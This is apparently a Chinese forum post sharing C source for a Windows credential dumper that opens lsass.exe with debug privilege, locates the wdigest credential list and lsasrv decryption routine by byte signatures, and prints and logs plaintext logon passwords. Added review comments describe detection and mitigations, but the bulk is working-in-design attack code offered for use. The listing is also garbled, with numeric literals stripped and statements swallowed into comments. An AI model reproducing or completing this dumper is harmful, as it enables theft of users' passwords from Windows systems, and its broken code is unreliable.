从一好朋友那得到一个好东西

可以读取系统明文

请用vc++ 6.0编译

#include <windows.h>
#include <stdio.h> //
// Vsbat[0x710dddd]
//
// Note: compile with VC++ 6.0 / run with Admin privileges
//
// NOTE(review): the page rendering stripped the numeric literals from this
// listing (e.g. `count = ;`, `dwVerOff = ;`) and collapsed some lines so
// that code ended up behind `//` comment markers (the `#define MEM_SIZE`
// below, a memset() in main(), the fwrite()/fclose() in k8writeTxt()). As
// shown, the file does not compile; the missing values are deliberately not
// reconstructed here.
//
// Defensive note: the behaviour implemented below -- enabling
// SeDebugPrivilege, opening lsass.exe with PROCESS_ALL_ACCESS and reading its
// memory with ReadProcessMemory -- is the canonical LSASS credential-dumping
// indicator. Alerting on cross-process handle opens against lsass.exe is the
// standard detection; Credential Guard and the WDigest UseLogonCredential=0
// setting remove the plaintext that this program reads.
// #define MEM_SIZE 0x1000
// OS kind selectors; main() sets one and CopyKeyGlobalData() switches on it.
#define WIN7 0x1
#define WINXP 0x2
#define WIN03 0x4
// Hand-declared copies of the Secur32/ntsecapi.h logon-session types,
// presumably because the VC++ 6.0 SDK does not ship them -- TODO confirm.
typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} LSA_UNICODE_STRING , *PLSA_UNICODE_STRING ;
typedef struct _SECURITY_LOGON_SESSION_DATA {
    ULONG Size;
    LUID LogonId;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING LogonDomain;
    LSA_UNICODE_STRING AuthenticationPackage;
    ULONG LogonType;
    ULONG Session;
    PSID Sid;
    LARGE_INTEGER LogonTime;
    LSA_UNICODE_STRING LogonServer;
    LSA_UNICODE_STRING DnsDomainName;
    LSA_UNICODE_STRING Upn;
} SECURITY_LOGON_SESSION_DATA, *PSECURITY_LOGON_SESSION_DATA ;
// Function-pointer types for entry points resolved at run time with
// GetProcAddress (ntdll, Secur32). pDECRIPTFUNC is the assumed signature of
// the unexported lsasrv routine that main() locates by byte pattern and calls
// as DecryptFunc(buf, len).
typedef int (__stdcall * pNTQUERYPROCESSINFORMATION)(HANDLE, DWORD, PVOID, ULONG, PULONG) ;
typedef int (__stdcall * pLSAENUMERATELOGONSESSIONS)(PULONG, PLUID *) ;
typedef int (__stdcall * pDECRIPTFUNC)(PBYTE, DWORD) ;
typedef int (__stdcall * pLSAFREERETURNBUFFER)(PVOID) ;
typedef int (__stdcall * pLSAGETLOGONSESSIONDATA)(PLUID, PSECURITY_LOGON_SESSION_DATA *) ;
// Forward declarations (definitions follow below in a different order).
int EnableDebugPrivilege() ;
void printHexBytes(PBYTE data, int nBytes) ;   // declared but not defined in this listing
PBYTE search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize) ;
void CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind) ;
HANDLE GetProcessHandleByName(const CHAR *szName) ;
LPVOID GetEncryptListHead() ;
void printSessionInfo(pLSAGETLOGONSESSIONDATA, pLSAFREERETURNBUFFER, PLUID) ;
// Byte patterns matched inside loaded DLL images by search_bytes(). They are
// tied to specific Windows builds; the XP and Win7 key signatures are chosen
// per osKind in CopyKeyGlobalData().
// Decrypt-function signature (lsasrv .text)
BYTE DecryptfuncSign[] = { 0x8B, 0xFF, 0x55, 0x8B,
0xEC, 0x6A, 0x00, 0xFF,
0x75, 0x0C, 0xFF, 0x75,
0x08, 0xE8 } ;
// Signature of the key-related address (lsasrv .text)
BYTE DecryptKeySign_WIN7[] = { 0x33, 0xD2, 0xC7, 0x45, 0xE8, 0x08, 0x00, 0x00, 0x00, 0x89, 0x55, 0xE4 } ;
BYTE DecryptKeySign_XP[] = { 0x8D, 0x85, 0xF0, 0xFE, 0xFF, 0xFF, 0x50, 0xFF, 0x75, 0x10, 0xFF, 0x35 } ;
// Ciphertext pointer signature (wdigest .text)
BYTE KeyPointerSign[] = { 0x8B, 0x45, 0x08, 0x89, 0x08, 0xC7, 0x40, 0x04 } ;
// Globals: MemBuf/SecBuf/ThirdBuf receive ReadProcessMemory copies of lsass
// key state in CopyKeyGlobalData(); MEM_SIZE is only visible above inside a
// comment (see the review note), so this line does not compile as shown.
BYTE MemBuf[MEM_SIZE], SecBuf[0x200], ThirdBuf[0x200] ;
BYTE Encryptdata[0x100] ;   // ciphertext copied from lsass; decrypted in place by main()
/*
 * GetProcessHandleByName - return an open handle to the first process whose
 * image file name (path basename, compared case-insensitively via lstrcmpi)
 * equals szName, or NULL if no process matches.
 *
 * The handle is opened with PROCESS_ALL_ACCESS; ownership passes to the
 * caller, who must CloseHandle() it. Handles of non-matching processes are
 * closed here.
 *
 * NOTE(review): the PID loop bounds and step, the NtQueryInformationProcess
 * information class, the offset into Buffer and two WideCharToMultiByte
 * arguments were stripped by the page rendering and are left blank below.
 */
HANDLE GetProcessHandleByName(const CHAR *szName)
{
    //
    // GetProcessHandle: obtain a handle to the lsass.exe process
    //
    DWORD dwProcessId , ReturnLength, nBytes ;
    WCHAR Buffer[MAX_PATH + 0x20] ;         // receives the image-name query result
    HANDLE hProcess ;
    PWCHAR pRetStr ;
    pNTQUERYPROCESSINFORMATION NtQueryInformationProcess ;
    CHAR szCurrentPath[MAX_PATH] ;
    // Resolved dynamically from ntdll. The result is not checked, so a NULL
    // from GetProcAddress would be called below.
    NtQueryInformationProcess = (pNTQUERYPROCESSINFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , \
    "NtQueryInformationProcess") ;
    // Process IDs are always multiples of 4 (start, bound and step stripped)
    for(dwProcessId = ; dwProcessId < * ; dwProcessId += )
    {
        // PROCESS_ALL_ACCESS is requested on every process, including
        // lsass.exe; this is exactly the handle-open pattern LSASS access
        // monitoring is designed to flag.
        hProcess = OpenProcess(PROCESS_ALL_ACCESS , FALSE, dwProcessId) ;
        if(hProcess != NULL)
        {
            if(!NtQueryInformationProcess(hProcess, , Buffer, sizeof(Buffer), &ReturnLength))
            {
                // Buffer presumably holds a UNICODE_STRING whose Buffer member
                // is read at the stripped offset -- TODO confirm against the
                // information class used.
                pRetStr = (PWCHAR)(*(DWORD *)((DWORD)Buffer + )) ;
                nBytes = WideCharToMultiByte(CP_ACP, , pRetStr, -, \
                szCurrentPath, MAX_PATH, NULL, NULL) ;
                if(nBytes)
                {
                    // Walk back to the last '\\' to isolate the basename.
                    // If the path contains no '\\', pCurName is decremented to
                    // one before szCurrentPath, an out-of-bounds pointer.
                    PCHAR pCurName = &szCurrentPath[nBytes-] ;
                    while(pCurName >= szCurrentPath)
                    {
                        if(*pCurName == '\\') break ;
                        pCurName -- ;
                    }
                    pCurName ++ ;
                    if(lstrcmpi(szName, pCurName) == )
                    {
                        return hProcess ;   // ownership passes to the caller
                    }
                }
            }
            // Close the handle we opened
            CloseHandle(hProcess) ;
        }
    }
    return NULL ;
}
/*
 * GetEncryptListHead - locate the address of the credential list head that
 * main() later walks inside lsass with ReadProcessMemory.
 *
 * Loads wdigest.dll into this process, scans from the module base up to the
 * address of SpInstanceInit for KeyPointerSign[] keeping the LAST match, then
 * reads a DWORD at a (stripped) negative offset from that match and returns
 * it after freeing the library.
 *
 * NOTE(review): the value comes from the local wdigest.dll mapping but is
 * used as an address inside lsass, so this appears to assume the DLL is
 * mapped at the same base in both processes.
 * NOTE(review): "no match" is indistinguishable from a match -- if the first
 * search_bytes() call returns NULL, KeyPointer is still hMod and the read
 * below lands before the module base. hMod and pEndAddr are never checked
 * for NULL either.
 */
LPVOID GetEncryptListHead()
{
    //
    // Use KeyPointerSign[] to find the key address related to ciphertext storage
    //
    HINSTANCE hMod ;
    LPVOID pEndAddr, KeyPointer, pTemp ;
    hMod = LoadLibrary("wdigest.dll") ;
    pEndAddr = GetProcAddress(hMod, "SpInstanceInit") ;
    pTemp = hMod ;
    KeyPointer = NULL ;
    // Each iteration resumes just past the previous hit, so the loop ends
    // with KeyPointer = the last occurrence below pEndAddr.
    while(pTemp < pEndAddr && pTemp != NULL)
    {
        KeyPointer = pTemp ;
        pTemp = (LPVOID)search_bytes((PBYTE)pTemp + sizeof(KeyPointerSign), (PBYTE)pEndAddr, \
        KeyPointerSign, sizeof(KeyPointerSign)) ;
    }
    KeyPointer = (LPVOID)(*(DWORD *)((DWORD)KeyPointer - )) ;   // offset stripped
    FreeLibrary(hMod) ;
    return KeyPointer ;
}
/*
 * k8writeTxt - append the NUL-terminated string logtext to "syspass.log" in
 * the current directory.
 *
 * NOTE(review): as rendered, the body only calls fopen(); the fwrite() and
 * fclose() were swallowed into the comment below by the page's line collapse,
 * so the FILE* is leaked. Even in the intended form the fopen() result is
 * not checked before use, the fwrite() count literal is stripped, the
 * fclose() result is ignored and no separator is written between entries.
 * main() passes it a buffer it prints as a wide string, so strlen() stops at
 * the first zero byte.
 */
void k8writeTxt(char* logtext)
{
    // append to a text file
    FILE* pFile = NULL;
    pFile = fopen( "syspass.log", "a+" );
    // Author's note (translated): for 12345/n5678/n, using sizeof only wrote 1234
    //fwrite( ptext2, sizeof(ptext2), 1, pFile );
    // NOTE(review): the following two statements were swallowed into this
    // comment by the page's line collapse:
    // fwrite( logtext, strlen(logtext), , pFile ); fclose( pFile );
    // Author's note (translated): the terminator is written on close
}
/*
 * main - program entry point.
 *
 * Flow: enable SeDebugPrivilege, open lsass.exe, classify the OS version,
 * locate the lsasrv decrypt routine and the wdigest list head by byte
 * signature, pull lsass's key state into this process via
 * CopyKeyGlobalData(), then for every logon session walk the remote list,
 * copy that session's ciphertext, run the decrypt routine on the local copy
 * and print/log the result.
 *
 * NOTE(review): numeric literals (return values, version numbers, dwVerOff,
 * struct offsets, the loop start) were stripped by the page rendering;
 * `return ;` in an int-returning main is one symptom. Declarations after
 * statements (OSVERSIONINFO, DecryptFunc, ListHead, ...) are not C89, so
 * VC++ 6.0 presumably accepts this only when compiled as C++.
 * NOTE(review): no result is checked -- LoadLibrary/GetProcAddress, the
 * search_bytes() result assigned to DecryptFunc (a NULL is then called),
 * LsaEnumerateLogonSessions and every ReadProcessMemory. If the read inside
 * the list walk fails, EncryptBuf is likely left unchanged and the while
 * loop never terminates.
 * NOTE(review): nBytes is a 16-bit value read from remote memory (up to
 * 0xFFFF) but Encryptdata is 0x100 bytes, and the ReadProcessMemory into it
 * has no bound check.
 */
int main()
{
    HINSTANCE hModlsasrv ;
    DWORD LogonSessionCount, i ,dwBytesRead ;
    PLUID LogonSessionList, pCurLUID , pListLUID ;
    BYTE EncryptBuf[0x200] ;     // local copy of one remote list node
    HANDLE hProcess ;
    // A failure here only prints; execution continues regardless.
    if(EnableDebugPrivilege() != )
        puts("EnableDebugPrivilege fail !") ;
    hProcess = GetProcessHandleByName("lsass.exe") ;
    if(hProcess == NULL)
    {
        puts("GetProcessHandleByName fail !") ;
        puts("Try To Run As Administrator ...") ;
        system("echo Press any Key to Continue ... & pause > nul") ;
        return ;
    }
    OSVERSIONINFO VersionInformation ;
    // dwVerOff: per-OS distance from a node's LUID to its ciphertext
    // descriptor; osKind: WINXP / WIN03 / WIN7 (sentinel literal stripped).
    DWORD dwVerOff = , osKind = - ;
    // OS version check (major/minor literals stripped)
    memset(&VersionInformation, , sizeof(VersionInformation));
    VersionInformation.dwOSVersionInfoSize = sizeof(VersionInformation) ;
    GetVersionEx(&VersionInformation) ;
    if (VersionInformation.dwMajorVersion == )
    {
        if ( VersionInformation.dwMinorVersion == )
        {
            dwVerOff = ;
            osKind = WINXP ;
        }
        else if (VersionInformation.dwMinorVersion == )
        {
            dwVerOff = ;
            osKind = WIN03 ;
        }
    }
    else if (VersionInformation.dwMajorVersion == )
    {
        dwVerOff = ;
        osKind = WIN7 ;
    }
    if(osKind == -)
    {
        printf("[Undefined OS version] Major: %d Minor: %d\n", \
        VersionInformation.dwMajorVersion, VersionInformation.dwMinorVersion) ;
        system("echo Press any Key to Continue ... & pause > nul") ;
        CloseHandle(hProcess) ;
        return ;
    }
    // Locate the decryption function address: pattern search over
    // [hModlsasrv, 0x7fffdddd), i.e. well past the module image; a NULL
    // result is not checked.
    pDECRIPTFUNC DecryptFunc ;
    hModlsasrv = LoadLibrary("lsasrv.dll") ;
    DecryptFunc = (pDECRIPTFUNC)search_bytes((PBYTE)hModlsasrv, (PBYTE)0x7fffdddd, DecryptfuncSign, sizeof(DecryptfuncSign)) ;
    // Get the ciphertext list head address
    LPVOID ListHead ;
    ListHead = GetEncryptListHead() ;
    // Fetch global data (lsasrv .data and the key-related data) into this process
    CopyKeyGlobalData(hProcess, hModlsasrv, osKind) ;
    HINSTANCE hModSecur32 ;
    pLSAENUMERATELOGONSESSIONS LsaEnumerateLogonSessions ;
    pLSAGETLOGONSESSIONDATA LsaGetLogonSessionData ;
    pLSAFREERETURNBUFFER LsaFreeReturnBuffer ;
    hModSecur32 = LoadLibrary("Secur32.dll") ;
    LsaEnumerateLogonSessions = (pLSAENUMERATELOGONSESSIONS)GetProcAddress(hModSecur32, "LsaEnumerateLogonSessions") ;
    LsaGetLogonSessionData = (pLSAGETLOGONSESSIONDATA)GetProcAddress(hModSecur32, "LsaGetLogonSessionData") ;
    LsaFreeReturnBuffer = (pLSAFREERETURNBUFFER)GetProcAddress(hModSecur32, "LsaFreeReturnBuffer") ;
    LsaEnumerateLogonSessions(&LogonSessionCount, &LogonSessionList) ;
    for(i = ; i < LogonSessionCount ; i++)
    {
        pCurLUID = (PLUID)((DWORD)LogonSessionList + sizeof(LUID) * i) ;
        // Print session info
        printSessionInfo(LsaGetLogonSessionData, LsaFreeReturnBuffer, pCurLUID) ;
        // Walk the remote linked list looking for the current LUID. The first
        // DWORD of each node is treated as the next pointer and the LUID is
        // read at +0x10; the walk has no iteration bound.
        ReadProcessMemory(hProcess, ListHead, EncryptBuf, 0x100, &dwBytesRead) ;
        while(*(DWORD *)EncryptBuf != (DWORD)ListHead)
        {
            ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)EncryptBuf), EncryptBuf, 0x100, &dwBytesRead) ;
            pListLUID = (LUID *)((DWORD)EncryptBuf + 0x10) ;
            if((pListLUID->LowPart == pCurLUID->LowPart) && (pListLUID->HighPart == pCurLUID->HighPart))
            {
                break ;
            }
        }
        if(*(DWORD *)EncryptBuf == (DWORD)ListHead)
        {
            puts("Specific LUID NOT found\n") ;
            continue ;
        }
        DWORD pFinal = ;
        DWORD nBytes = ;
        LPVOID pEncrypt ;
        pFinal = (DWORD)(pListLUID) + dwVerOff ;
        nBytes = *(WORD *)((DWORD)pFinal + ) ;   // ciphertext size (offset stripped)
        pEncrypt = (LPVOID)(*(DWORD *)((DWORD)pFinal + )) ;   // ciphertext address (remote; offset stripped)
        // NOTE(review): the following statement was swallowed into the comment
        // above by the page's line collapse:
        // memset(Encryptdata, , sizeof(Encryptdata)) ;
        ReadProcessMemory(hProcess, (LPVOID)pEncrypt, Encryptdata, nBytes, &dwBytesRead) ;
        // Call the decryption function (decrypts Encryptdata in place)
        DecryptFunc(Encryptdata, nBytes) ;
        // Print the plaintext password; %S expects a NUL-terminated wide string
        printf("password: %S\n\n", Encryptdata) ;
        k8writeTxt((char*)Encryptdata);   // save to log (narrow strlen on wide data)
    }
    CloseHandle(hProcess) ;
    LsaFreeReturnBuffer(LogonSessionList) ;
    FreeLibrary(hModlsasrv) ;
    FreeLibrary(hModSecur32) ;
    // Undo the extra LoadLibrary calls CopyKeyGlobalData() makes on Win7.
    if(osKind == WIN7)
    {
        FreeLibrary(GetModuleHandle("bcrypt.dll")) ;
        FreeLibrary(GetModuleHandle("bcryptprimitives.dll")) ;
    }
    system("echo Press any Key to EXIT ... & pause > nul") ;
    return ;
}
/*
 * printSessionInfo - print the user name and logon domain of the logon
 * session identified by pCurLUID, using the Secur32 entry points passed in.
 *
 * NOTE(review): the LsaGetLogonSessionData() status is not checked; on
 * failure pLogonSessionData is uninitialized and dereferenced. The LSA
 * strings are printed with %S although an LSA_UNICODE_STRING carries a byte
 * Length and is not guaranteed to be NUL-terminated.
 */
void printSessionInfo(pLSAGETLOGONSESSIONDATA LsaGetLogonSessionData, pLSAFREERETURNBUFFER LsaFreeReturnBuffer, PLUID pCurLUID)
{
    PSECURITY_LOGON_SESSION_DATA pLogonSessionData ;
    LsaGetLogonSessionData(pCurLUID, &pLogonSessionData) ;
    printf("UserName: %S\n", pLogonSessionData->UserName.Buffer) ;
    printf("LogonDomain: %S\n", pLogonSessionData->LogonDomain.Buffer) ;
    LsaFreeReturnBuffer(pLogonSessionData) ;   // buffer is LSA-owned; released here
}
/*
 * EnableDebugPrivilege - enable SeDebugPrivilege on the current process
 * token so that OpenProcess() on lsass.exe can succeed.
 *
 * Returns an int status; the literals were stripped by the page rendering
 * and main() compares the result against a stripped value.
 *
 * NOTE(review): hToken is never closed on any path (handle leak). A non-zero
 * AdjustTokenPrivileges() result does not mean the privilege was granted;
 * GetLastError() must be compared with ERROR_NOT_ALL_ASSIGNED, which is the
 * typical outcome when the caller is not an elevated administrator.
 * Enabling SeDebugPrivilege is itself auditable via privilege-use events.
 */
int EnableDebugPrivilege()
{
    HANDLE hToken ;
    LUID sedebugnameValue ;
    TOKEN_PRIVILEGES tkp ;
    if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) )
    {
        puts("OpenProcessToken fail") ;
        return ;
    }
    if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
    {
        puts("LookupPrivilegeValue fail") ;
        return ;
    }
    // One privilege entry (count and array index literals stripped)
    tkp.PrivilegeCount = ;
    tkp.Privileges[].Luid = sedebugnameValue ;
    tkp.Privileges[].Attributes = SE_PRIVILEGE_ENABLED ;
    if(!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL) )
    {
        puts("AdjustTokenPrivileges fail") ;
        return ;
    }
    return ;
}
/*
 * search_bytes - find the first occurrence of the nsize-byte pattern at
 * pBytes within [pBegin, pEnd). Returns a pointer to the start of the match,
 * or NULL when the pattern does not occur. A plain memmem-style scan; all
 * pointer arithmetic goes through DWORD, so this is 32-bit only.
 *
 * NOTE(review): `count` is only assigned inside the outer loop. When
 * pBegin + nsize > pEnd on entry, the body never runs and the final
 * `count == nsize` test reads an uninitialized variable. The reset literal
 * and the advance literal after a failed attempt were stripped by the page
 * rendering.
 */
PBYTE search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize)
{
    //
    // Search between pBegin and pEnd for the byte sequence at pBytes, nsize bytes long
    //
    DWORD count ;
    PBYTE pDst ;
    while((DWORD)pBegin + (DWORD)nsize <= (DWORD)pEnd)
    {
        pDst = pBytes ;
        count = ;
        // Compare byte by byte, advancing both cursors on each match.
        while(count < nsize && *pBegin == *pDst)
        {
            pBegin ++ ;
            pDst ++ ;
            count ++ ;
        }
        if(count == nsize) break ;
        // Rewind to the start of this attempt, then step the scan forward.
        pBegin = pBegin - count + ;
    }
    if(count == nsize)
    {
        // pBegin points one past the match; back up by its length.
        return (PBYTE)((DWORD)pBegin - (DWORD)count) ;
    }
    else
    {
        return NULL ;
    }
}
/*
 * CopyKeyGlobalData - prepare the locally loaded lsasrv.dll so its decrypt
 * routine can be called in this process: overwrite its second PE section
 * (presumably .data; the section name is never checked) with lsass's copy of
 * that section, then redirect the key-related pointers inside it to local
 * buffers (MemBuf, SecBuf, ThirdBuf) filled from lsass by ReadProcessMemory.
 *
 * hProcess   - handle to lsass.exe (from GetProcessHandleByName)
 * hModlsasrv - base of lsasrv.dll loaded into this process
 * osKind     - WINXP / WIN03 / WIN7; selects the key signature and layout
 *
 * NOTE(review): ReadProcessMemory() writes straight into the module image
 * (pdataAddr is both remote source and local destination), so this depends
 * on that section being writable locally and appears to assume lsasrv.dll
 * shares its load address with lsass. The copy size rounds VirtualSize up
 * to the next 0x1000 multiple (rounding literal stripped) and may overrun
 * the section.
 * NOTE(review): the search_bytes() result can be NULL and is dereferenced
 * unchecked; no ReadProcessMemory() result is checked; the switch has no
 * default, so an unknown osKind silently does nothing; several offsets were
 * stripped by the page rendering.
 */
void CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind)
{
    PIMAGE_SECTION_HEADER pSectionHead ;
    PIMAGE_DOS_HEADER pDosHead ;
    PIMAGE_NT_HEADERS pPEHead ;
    DWORD dwBytes, dwBytesRead ;
    LPVOID pdataAddr, pDecryptKey , DecryptKey, pEndAddr ;
    pDosHead = (PIMAGE_DOS_HEADER)hModlsasrv ;
    // The first section header follows IMAGE_NT_HEADERS; adding one more
    // IMAGE_SECTION_HEADER selects the second section.
    pSectionHead = (PIMAGE_SECTION_HEADER)(pDosHead->e_lfanew + (DWORD)hModlsasrv \
    + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER)) ;
    pdataAddr = (LPVOID)((DWORD)pSectionHead->VirtualAddress + (DWORD)hModlsasrv) ;
    dwBytes = ((DWORD)(pSectionHead->Misc.VirtualSize) / 0x1000 + ) * 0x1000 ;
    // Overwrite the local section with lsass's version of it.
    ReadProcessMemory(hProcess, pdataAddr, pdataAddr, dwBytes, &dwBytesRead) ;
    pPEHead = (PIMAGE_NT_HEADERS)(pDosHead->e_lfanew + (DWORD)hModlsasrv) ;
    pEndAddr = (LPVOID)(pPEHead->OptionalHeader.SizeOfImage + (DWORD)hModlsasrv) ;   // end of the mapped image
    switch(osKind)
    {
    case WINXP :
    case WIN03 :
    {
        // The DWORD right after the signature hit is taken as the remote key pointer.
        pDecryptKey = (LPVOID)search_bytes((PBYTE)(hModlsasrv), (PBYTE)pEndAddr , \
        DecryptKeySign_XP, sizeof(DecryptKeySign_XP)) ;
        pDecryptKey = (LPVOID)*(DWORD *)((DWORD)pDecryptKey + sizeof(DecryptKeySign_XP)) ;
        ReadProcessMemory(hProcess, (LPVOID)pDecryptKey, &DecryptKey, , &dwBytesRead) ;   // size literal stripped
        // DecryptKey is the key address used in decryption
        ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead) ;
        // Point the local copy at MemBuf instead of the remote address.
        pdataAddr = (LPVOID)pDecryptKey ;
        *(DWORD *)pdataAddr = (DWORD)MemBuf ;
        break ;
    }
    case WIN7 :
    {
        // On Win7 the decrypt routine calls into these two DLLs; main() frees them again.
        LoadLibrary("bcrypt.dll") ;
        LoadLibrary("bcryptprimitives.dll") ;
        pDecryptKey = (LPVOID)search_bytes((PBYTE)(hModlsasrv), (PBYTE)pEndAddr , \
        DecryptKeySign_WIN7, sizeof(DecryptKeySign_WIN7)) ;
        pDecryptKey = (LPVOID)(*(DWORD *)((DWORD)pDecryptKey - )) ;   // offset stripped
        // DecryptKey is the key address used in decryption
        ReadProcessMemory(hProcess, pDecryptKey, &DecryptKey, 0x4, &dwBytesRead) ;
        ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead) ;
        pdataAddr = (LPVOID)pDecryptKey ;
        *(DWORD *)pdataAddr = (DWORD)MemBuf ;
        // Two pointers inside the copied block are themselves remote: fetch
        // what they reference and redirect them to local SecBuf / ThirdBuf.
        ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)((DWORD)MemBuf + )), SecBuf, 0x200, &dwBytesRead) ;
        pdataAddr = (LPVOID)((DWORD)MemBuf + ) ;
        *(DWORD *)pdataAddr = (DWORD)SecBuf ;
        ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)((DWORD)MemBuf + 0xC)), ThirdBuf, 0x200, &dwBytesRead) ;
        pdataAddr = (LPVOID)((DWORD)MemBuf + 0xC) ;
        *(DWORD *)pdataAddr = (DWORD)ThirdBuf ;
        break ;
    }
    }
    return ;
}
